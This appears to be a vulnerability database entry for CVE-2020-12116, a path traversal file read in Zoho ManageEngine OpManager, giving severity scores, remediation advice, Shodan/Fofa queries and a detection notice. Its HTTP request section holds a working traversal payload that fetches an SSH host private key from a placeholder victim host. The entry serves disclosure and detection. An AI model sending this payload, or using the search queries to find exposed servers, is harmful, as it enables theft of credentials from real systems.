🔙 목록으로 돌아가기

CVE-2020-12116: Zoho ManageEngine OpManger - Arbitrary File Read

TitleZoho ManageEngine OpManger - Arbitrary File Read
Authordwisiswant0
SeverityHigh
ImpactAn attacker can read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation.
RemediationApply the latest security patch or upgrade to a patched version of Zoho ManageEngine OpManger to mitigate the vulnerability.
CVSS Score7.5
EPSS Score0.91736
CVE IDCVE-2020-12116
CWE IDCWE-22
Shodan Queryhttp.title:"opmanager plus"
Fofa Querytitle="opmanager plus"
Tags cve cve2020 zoho lfi manageengine zohocorp vuln

🔍 Vulnerability Description

Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a specially crafted request.

🌐 HTTP Request

GET / HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/603.1.10 (KHTML, like Gecko) Version/10.1 Safari/603.1.10
Accept: */*
Connection: close
Accept-Encoding: gzip
GET /JItGMd../../../../bin/.ssh_host_rsa_key HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Safari/605.1.15
Accept: */*
Cache-Control: max-age=0
Connection: close
Referer: http://www.victim.com
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-12116.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-12116.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A